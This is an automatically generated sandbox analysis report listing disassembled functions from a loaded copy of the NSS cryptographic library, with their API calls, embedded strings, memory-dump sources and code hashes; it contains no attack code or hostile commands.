                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2815116071-0
                                                                                                                                                                                                                                                      • Opcode ID: 529d4b8f5aaafb1214ffb1661fa1b24f15336bd7d13b7941cd53fdf6c6c6791d
                                                                                                                                                                                                                                                      • Instruction ID: 612b983522e8243ac1a4131cbb06d60ed35fa1bbffc70fcaafc7fc15a2282a88
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 529d4b8f5aaafb1214ffb1661fa1b24f15336bd7d13b7941cd53fdf6c6c6791d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E1C2706093019FE710EF28D890F6AB7E5AF44709F12492DE8899BB55E732FC05CB92
                                                                                                                                                                                                                                                      Function 6C461C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C461C6B
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C461C75
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C461CA1
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 6C461CA9
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000000), ref: 6C461CB4
                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C461CCC
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C461CE4
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 6C461CEC
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000000), ref: 6C461CFD
                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C461D0F
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C461D17
                                                                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32 ref: 6C461D4D
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C461D73
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C461D7F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C461D7A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                                                      • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                                                      • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                                                      • Opcode ID: 3e8305179aed0449193628a49959adf63202d0607b103ad970aa1416d67ef101
                                                                                                                                                                                                                                                      • Instruction ID: 6755391e972279a1cfe59d7bdfba78a1f0c7282783b67a1b42084e011ac87112
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8305179aed0449193628a49959adf63202d0607b103ad970aa1416d67ef101
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 723157B1A01618AFDF10EF64CC48BAA7BB8FF4A345F014169F60992650E7306E94CF6D
                                                                                                                                                                                                                                                      Function 6C463D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C463DFB
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 6C463EEC
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C463FA3
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C464047
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4640DE
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C46415F
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 6C46416B
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C464288
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4642AB
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 6C4642B7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                                                                      • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                                                                      • API String ID: 703928654-3678606288
                                                                                                                                                                                                                                                      • Opcode ID: a42e878d35b84fba7fd384698cbebc13caf4d9880f7e5952ce197ea5304d6040
                                                                                                                                                                                                                                                      • Instruction ID: 0ab4c33ba4f61d1b18f0ea017116dea77a61f14442b42f3a18eb332985034b73
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a42e878d35b84fba7fd384698cbebc13caf4d9880f7e5952ce197ea5304d6040
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F12271A087809FDB15CF39C850F6BB7F6AF86348F148A1DE48597B55E730D8868B42
                                                                                                                                                                                                                                                      Function 6C46EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46EF63
                                                                                                                                                                                                                                                        • Part of subcall function 6C4787D0: PORT_NewArena_Util.NSS3(00000800,6C46EF74,00000000), ref: 6C4787E8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C46EF74,00000000), ref: 6C4787FD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C47884C
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C46F2D4
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46F2FC
                                                                                                                                                                                                                                                      • SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C46F30F
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C46F374
                                                                                                                                                                                                                                                      • PL_strcasecmp.NSS3(6C5B2FD4,?), ref: 6C46F457
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C46F4D2
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C46F66E
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C46F67D
                                                                                                                                                                                                                                                      • CERT_DestroyName.NSS3(?), ref: 6C46F68B
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C478338
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C478364
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C47838E
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4783A5
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4783E3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C4784D9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C478528
                                                                                                                                                                                                                                                        • Part of subcall function 6C478900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C478955
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
                                                                                                                                                                                                                                                      • String ID: "$*$oid.
                                                                                                                                                                                                                                                      • API String ID: 4161946812-2398207183
                                                                                                                                                                                                                                                      • Opcode ID: 9c98528fcc0ce187202d06441a4a1b65aa46c43aba212d731bb7403929fbc486
                                                                                                                                                                                                                                                      • Instruction ID: f286c6349870113f842c2b74314245c34adc8407fc8e868226c4de6770728951
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c98528fcc0ce187202d06441a4a1b65aa46c43aba212d731bb7403929fbc486
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E225B7160E3404BF710CE1AC890F6AB7E6AB85359F18462EE4D587F99E7319C06CB83
                                                                                                                                                                                                                                                      Function 6C411C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C411D58
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C411EFD
                                                                                                                                                                                                                                                      • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C411FB7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • abort due to ROLLBACK, xrefs: 6C412223
                                                                                                                                                                                                                                                      • another row available, xrefs: 6C412287
                                                                                                                                                                                                                                                      • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C411F83
                                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 6C4120CA
                                                                                                                                                                                                                                                      • unsupported file format, xrefs: 6C412188
                                                                                                                                                                                                                                                      • sqlite_temp_master, xrefs: 6C411C5C
                                                                                                                                                                                                                                                      • no more rows available, xrefs: 6C412264
                                                                                                                                                                                                                                                      • sqlite_master, xrefs: 6C411C61
                                                                                                                                                                                                                                                      • unknown error, xrefs: 6C412291
                                                                                                                                                                                                                                                      • table, xrefs: 6C411C8B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                                                      • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                                                      • API String ID: 563213449-2102270813
                                                                                                                                                                                                                                                      • Opcode ID: 21cbc5729982ada99b85cb3d0da024b092a14dd218a86b1599ff2efa3dc999b2
                                                                                                                                                                                                                                                      • Instruction ID: 85cefe7e81ad521ceca978931e28bc61dff3568743bf4eb5df4e8c4cadc03005
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21cbc5729982ada99b85cb3d0da024b092a14dd218a86b1599ff2efa3dc999b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC12AD7060C3418FD714CF19C484E6ABBF2AF86318F188A5DD9D99BB51DB31E846CB82
                                                                                                                                                                                                                                                      Function 6C435F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
                                                                                                                                                                                                                                                      • API String ID: 0-3593521594
                                                                                                                                                                                                                                                      • Opcode ID: 5444aae386b1c1956ca4bbce291b7c08c32af9fd46b49573d675359827723eb8
                                                                                                                                                                                                                                                      • Instruction ID: 70c3f2332e3683cd7be1ccafb7a99889834b05c428aea7eb262ce0210fa7ec44
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5444aae386b1c1956ca4bbce291b7c08c32af9fd46b49573d675359827723eb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44438074A08361CFD304CF16C590E5ABBE2BFC9318F14966DE8998B752D731E846CB92
                                                                                                                                                                                                                                                      Function 6C4DEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C4DDAE2,?), ref: 6C4DC6C2
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF0AE
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF0C8
                                                                                                                                                                                                                                                      • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C4DF101
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF11D
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C5A218C), ref: 6C4DF183
                                                                                                                                                                                                                                                      • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C4DF19A
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DF1CB
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C4DF1EF
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C4DF210
                                                                                                                                                                                                                                                        • Part of subcall function 6C4852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C4852F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C48530F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C485326
                                                                                                                                                                                                                                                        • Part of subcall function 6C4852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C485340
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DF227
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C4DF23E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4DF2BB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4DF3A8
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C4DF3B3
                                                                                                                                                                                                                                                        • Part of subcall function 6C482D20: PK11_DestroyObject.NSS3(?,?), ref: 6C482D3C
                                                                                                                                                                                                                                                        • Part of subcall function 6C482D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C482D5F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1559028977-0
                                                                                                                                                                                                                                                      • Opcode ID: d74b1dd5c37b331efd40521c015da10455c74cc034ef94a72a0b770dfe9ff31f
                                                                                                                                                                                                                                                      • Instruction ID: 8f25ea4c68656c7e179c69d29f09bd35bbd183f074dc28751d8b9e9ba0bbb8b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d74b1dd5c37b331efd40521c015da10455c74cc034ef94a72a0b770dfe9ff31f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BD191B6E026059FEB24DF99D890E9EB7F5EF48308F168029D915A7711E731F806CB90
                                                                                                                                                                                                                                                      Function 6C50DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002,00000000,?,6C4E7FFA,00000002), ref: 6C50DE33
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                        • Part of subcall function 6C50D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C50DE74,6C4E7FFA,00000002,?,?,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002), ref: 6C50D008
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002,00000000,?,6C4E7FFA,00000002), ref: 6C50DE57
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000088), ref: 6C50DEA5
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C50E069
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C50E121
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6C50E14F
                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C50E195
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C50E1FC
                                                                                                                                                                                                                                                        • Part of subcall function 6C502460: PR_SetError.NSS3(FFFFE005,00000000,6C5A7379,00000002,?), ref: 6C502493
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
